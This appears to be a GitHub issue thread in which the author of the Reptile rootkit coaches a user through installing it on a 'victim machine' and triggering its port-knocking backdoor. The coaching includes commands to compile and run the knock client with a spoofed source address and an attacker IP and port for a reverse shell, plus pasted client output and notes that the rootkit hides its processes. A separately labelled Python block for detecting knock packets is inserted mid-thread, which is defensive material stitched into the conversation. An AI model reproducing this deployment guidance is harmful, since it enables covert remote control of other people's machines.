Having trouble in getting the backdoor to work #12

Closed
evelynEdison opened this issue Mar 11, 2018 · 11 comments

@evelynEdison

Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.

@f0rb1dd3n
Owner

f0rb1dd3n commented Mar 11, 2018

You have to install the rootkit only on the victim machine. On your attacker machine you will only run the client.

I made the shell script and makefiles generate the client on the victim to give you a way to attack other hosts in the network from the victim. But from your main attack machine's perspective you only have to compile knock.c, just by typing:

cd Reptile/sbin
gcc knock.c -o knock
./knock 

You have to choose the protocol, target address, source address (if you want to spoof your address), and the payload with key+ip+port.

You don't need to use netcat, because I have already implemented the listener; just use the -l option at the end. Something like this:

./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l

Take a look into the code and change the key on heavens_door.c if you want.

I think this helps you.

F0rb1dd3n

@evelynEdison
Author

Hello, should I run the ./heavens_door command first on the victim machine?
I ran the ./heavens_door command on the victim machine and ran lsof -i tcp:80, but nothing shows on the screen. I think it should listen on port 80.

@f0rb1dd3n
Owner

f0rb1dd3n commented Mar 13, 2018

No man, Reptile already runs heavens_door for you and hides its processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesn't listen on any port; it is a port-knocking backdoor, it just inspects the packets that are being received on the machine, and returns a shell if it is the right packet.

Originally I configured it to inspect only packets received via ICMP, TCP on port 80, or UDP on port 53. But that is irrelevant, you can change this. There is no listening port, only an inspection of packets that are targeting a port.
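
Added example, not part of the original thread or the Reptile code: because nothing listens, lsof shows no socket, so a defender has to look at the traffic itself. This sketch flags packets on the three channels named above whose payload has the "<key> <IP> <port>" shape, assuming the knock data travels as the plain text typed after -d (if the client encodes it, that decoding has to be added); parse_ipv4, find_knock and build are hypothetical names and the packets are constructed samples.

```python
import ipaddress
import re
import struct

# Channels named in the thread: ICMP, TCP to port 80, UDP to port 53.
WATCHED = {(1, None), (6, 80), (17, 53)}
# ASSUMPTION: knock data is on the wire as typed after -d: "<key> <IPv4> <port>".
KNOCK = re.compile(rb"(\S{4,32}) (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5})")

def parse_ipv4(pkt):
    """Return (protocol, destination port or None, payload) of a raw IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4
    proto, l4 = pkt[9], pkt[ihl:]
    if proto == 1:                                   # ICMP, 8-byte header
        return proto, None, l4[8:]
    dport = struct.unpack("!H", l4[2:4])[0]
    if proto == 17:                                  # UDP, 8-byte header
        return proto, dport, l4[8:]
    if proto == 6:                                   # TCP, header length in byte 12
        return proto, dport, l4[(l4[12] >> 4) * 4:]
    return proto, None, b""

def find_knock(pkt):
    """Return (callback_ip, callback_port) if pkt looks like a knock, else None."""
    try:
        proto, dport, payload = parse_ipv4(pkt)
    except (IndexError, struct.error):
        return None                                  # truncated packet
    m = KNOCK.search(payload) if (proto, dport) in WATCHED else None
    if m is None:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group(2).decode())
    except ValueError:
        return None                                  # e.g. an octet above 255
    port = int(m.group(3))
    return (str(ip), port) if 0 < port < 65536 else None

def build(proto, dport, data):
    """Constructed sample: minimal IPv4 + ICMP/UDP/TCP header (zero checksums)."""
    if proto == 1:
        l4 = b"\x08\x00" + bytes(6)
    elif proto == 17:
        l4 = struct.pack("!HHHH", 40000, dport, 8 + len(data), 0)
    else:
        l4 = struct.pack("!HHIIBBHHH", 40000, dport, 0, 0, 5 << 4, 0x18, 0, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(data), 0, 0,
                     64, proto, 0, bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return ip + l4 + data
```

The returned address and port are the callback endpoint named in the knock, which is the value to pivot on in flow logs.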

@evelynEdison
Author

evelynEdison commented Mar 13, 2018

Hello, I have a doubt about the <reverse IP> in the line below:

-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"

If my real source ip is 192.168.2.13, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 192.168.2.13 4444"?

@f0rb1dd3n
Owner

No man, you have to use the normal form -d "F0rb1dd3n 192.168.2.13 4444"

The client will do the whole job for you.

@f0rb1dd3n
Owner

@rabbpigPan are you having any other trouble? Can we close this issue?

@evelynEdison
Author

evelynEdison commented Mar 14, 2018

Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,

Knock Knock on Heaven's (Back)Door
Written by: F0rb1dd3n

Knock knock Neo...

[+] Knocking with UDP protocol
.........
[+] 59 bytes was sent

it only showed the information above and didn't prompt the reverse shell for a long time.

Does it support the NAT network or only work on the local network?

@f0rb1dd3n
Owner

This backdoor does not support NAT, only the local network.

@evelynEdison
Author

Thanks for your reply. You can close the issue now.

@ghost

ghost commented Oct 4, 2018

This backdoor does not support NAT, it only supports the local network

Does not support the public network, only supports the internal network?

@f0rb1dd3n
Owner

Just the internal, unless you have a NAT
